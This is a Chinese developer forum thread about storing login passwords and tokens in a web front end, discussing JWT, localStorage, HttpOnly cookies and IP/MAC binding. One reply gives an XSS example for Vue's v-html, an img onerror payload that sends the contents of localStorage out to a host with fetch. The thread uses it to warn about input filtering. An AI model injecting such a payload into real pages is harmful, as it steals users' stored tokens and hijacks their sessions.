如何破解前端保存的用户密码？

掩耳盗铃...

你怎么解密他就怎么解密，所以你为什么要把密码存在本地

hashids 放前端用？

建议上 OIDC

为什么要破解，我把你加密的密码存到我的 locaostorage 不就行了

1.攻击者要找到脚本漏洞使用 xss 攻击方式获取用户密码
2.应该保存 token 登陆，而不是密码明文。

@renmu 那你就理解成 jwt 吧，目的是免登录

@wunonglin 前后端都可以用吧，没在前端用过，理论上前端是透明的 道理我懂，只是一个不成熟的想法，想问问行不行得通，不行就算了。

@yaott2020 就是用的 jwt ，现在在思考前端如何保存 token ， 总不能每次都登录一下吧。

@DoveAz 感谢提醒， 一下子没想到这个。

@okakuyang 我以为 token 和密码是一样的，怎么保存密码就怎么保存 token ，密码怎么泄漏的，token 就怎么泄漏，泄漏 token ，攻击者就能以你的身份进行操作了。。

@renmu @wunonglin @yaott2020 @DoveAz @okakuyang

思考了一下，前端也不搞花里胡哨了，直接明文存 token ，后台对 token 和 IP +mac 绑定，校验 token 的同时校验 ip 和 mac ，如果不一致则校验失败，这样做还有风险么？？

@yjim 你这样保障安全性局限太大了吧

@yjim 那估计动不动就要重新登陆了

@yaott2020 比如？


@okakuyang 就我了解到的，现在的网络供应商一般都是 48 小时才重置一次 IP 吧，然后我这服务不是面向公众的，用户基本上都是在稳定的设备上登录使用，不至于动不动就要重新登录吧。

然后校验 ip 和 mac 只是一个思路 /方向。

只要明文传输,fiddler 抓一下就能看到,甚至都不需要知道他怎么加密的

@a33291 请求必然是 https 的

我就没搞懂，你前面搞这么复杂，后端请求难道不验证了吗？如果验证携带什么？如果不验证就类似开放的系统，破了其他用户密码有毛用？

MAC 怎么拿的？？

如果部分地方用了 v-html 渲染用户输入的内容 ，则可能被通过 XSS 攻击的方式获取到密码，例如：

<div v-html="content"></div>
content:'<img src="" onerror="fetch(`http://127.0.0.1/${JSON.stringify(localStorage)}`)" />'

@rabbbit vue 安全页面里有强调过这个，v-html 能不用就不用，用的话要对能容进行 xssfilter

想要安全就用 cookies ，然后设置 Secure 和 HttpOnly

@Senorsen 只是一个思路，不一定非要是 mac ，像一些大厂，你异地登录就能识别出来，然后要求手机验证，总有办法进行识别的。我原先想着在前端做一些保护，比如加密存储 token ，不过看起来前端是彻底暴露的，所以重点还是要在后端做好防护才行。

@rabbbit 感谢提醒，我去了解下这个

@yjim 比如我 wifi 数据互相切换，ip mac 全变了，不就得要重新登陆

你不如设置 cookie 存个 token ，设置过期时间

@yjim https 也一样抓啊

@blankmiss https 怎么抓？中间人攻击？

@yjim fiddler 类似这种需要添加 https 证书的抓包软件就行了

可以考虑非对称加密，客户端拿公钥加密存到本地，然后把密文发到服务端用私钥解密

（没用过 jwt

没看懂帖子想说什么，如果是 jwt 的话，前端保存 token 到 localstorage 就好了，jwt 指定一个小时过期，即将过期的前半个小时，前端判断快过期了，自己调用接口用旧 token 去更换新 token 。

只要用户一直在线四处浏览网页，就不会掉登录。

闲麻烦就用双 token ，一个时效长一点的 token(14 天)和时效一个小时的 token ，平时只用短时效的 tolen 请求 api ，token 快过期了，再用长 token 去刷新短 token

@blankmiss 防黑客不防用户自己，像你说的这种，前端防御更没意义。。。原主题的结果是前端防黑客也没啥大用。还是得后端配合。


@leaflxh jwt 也是生成密钥发给前端，我讨论的是前端 web 怎么存这个密钥来防黑客模拟用户身份进行操作。已得出初步结论：防不住，得后端来做校验